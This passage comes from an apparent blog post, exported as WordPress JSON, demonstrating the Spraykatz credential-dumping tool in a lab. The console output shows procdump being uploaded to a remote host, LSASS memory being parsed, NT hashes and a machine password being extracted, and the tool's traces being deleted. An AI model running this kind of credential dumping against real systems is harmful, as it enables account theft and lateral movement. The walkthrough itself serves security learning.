Be patient&#8230;<br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Uploading procdump to 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Executing procdump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Creating dump&#8217;s file descriptor on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Parsing 10.0.0.201&#8217;s dump remotely&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN10CLI02<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  blackhat<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span 
style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  WIN10CLI02$<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">fcdc607666845acba172b460939f8fa9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  win2019.priv<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  WIN10CLI02$<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;password:  <span 
style=\"color:#00b050\">31d47f5578cd912fd4e6d88a1bc86be46d7d37c2ffd05251b1c98cdd77e71cc37f08504087f18e572162655604adac497b156fdcb9b20b56f0ec5fe3c64b42b96cfbf6e26b5e8017d215479a2d456cf902e36ddad8dae64319f3d9fa79c1dee884c887834af056e459bf3ce3094dad4e1004985518b112e4dbfe24b4eb90a37248d71ef3a79507f4ad68d4b1a233c19448a56f06763079405b08d6e300a5a4e9eb11dc219ca52c5d3edead8fd1ef3ee7b211cbf6af66cc45ed6f090e4f1eb7968cf5cfffdbe06e919440b51056b5586869fefea7296a4c437c2faf240b90f86a4ebdf450fd2b8990061fd58abeef6e76<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  han<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; machine:  10.0.0.201<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  domain:  WIN2019<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; 
background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;username:  root<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  nthash:  <span style=\"color:#00b050\">329153f560eb329c0e1deea55e88a1e9<span style=\"color:white\"><br \/>\n<\/span><\/span><\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Closing dump file on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Deleting procdump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[#]   Deleting dump on 10.0.0.201&#8230;<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Credentials logged into: \/root\/spraykatz\/misc\/results\/creds.txt<br \/>\n<\/strong><\/span><\/p>\n<p><span style=\"color:white; font-family:Courier New; font-size:14pt; background-color:#080329\"><strong>[+] Exiting Gracefully&#8230;<\/strong><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>On the target system, we can retrieve the nthash for the following accounts:<\/p>\n<ul>\n<li>User accounts that have already opened a session on the target system:<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf3.png\" alt=\"\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf4.png\" alt=\"\"><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf5.png\" 
alt=\"\"><\/p>\n<ul>\n<li>Computer account for the target system:<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf6.png\" alt=\"\"><\/p>\n<p>Here is some additional information about how to use Spraykatz:<\/p>\n<ul>\n<li>Mandatory arguments<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf7.png\" alt=\"\"><\/p>\n<ul>\n<li>Optional arguments<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf8.png\" alt=\"\"><\/p>\n<h1>Spraykatz useful information<\/h1>\n<h2>Download page from GitHub<\/h2>\n<p>GitHub page: <a href=\"https:\/\/github.com\/aas-n\/spraykatz\">https:\/\/github.com\/aas-n\/spraykatz<\/a><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf9.png\" alt=\"\"><\/p>\n<h2>Author Twitter account<\/h2>\n<p><a href=\"https:\/\/twitter.com\/lydericlefebvre\">https:\/\/twitter.com\/lydericlefebvre<\/a><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/identitycosmos.com\/wp-content\/uploads\/2020\/03\/032820_1728_Spraykatzaf10.png\" alt=\"\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Introduction to Spraykatz As you may know, password hash dump is a very useful method to perform lateral movement or privilege escalation on a network. 
If you are using Active Directory, this method will be used by a lot of modern malware which include some code pieces from very known security tools like Mimikatz for [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,1,7],"tags":[14,55,181,199,225],"class_list":["post-2322","post","type-post","status-publish","format-standard","hentry","category-cybersecurity","category-non-classe","category-technique","tag-active-directory","tag-blueteam","tag-password-spray","tag-redteam","tag-spraykatz"],"_links":{"self":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts\/2322","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/comments?post=2322"}],"version-history":[{"count":0,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/posts\/2322\/revisions"}],"wp:attachment":[{"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/media?parent=2322"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/categories?post=2322"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/identitycosmos.com\/index.php\/wp-json\/wp\/v2\/tags?post=2322"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}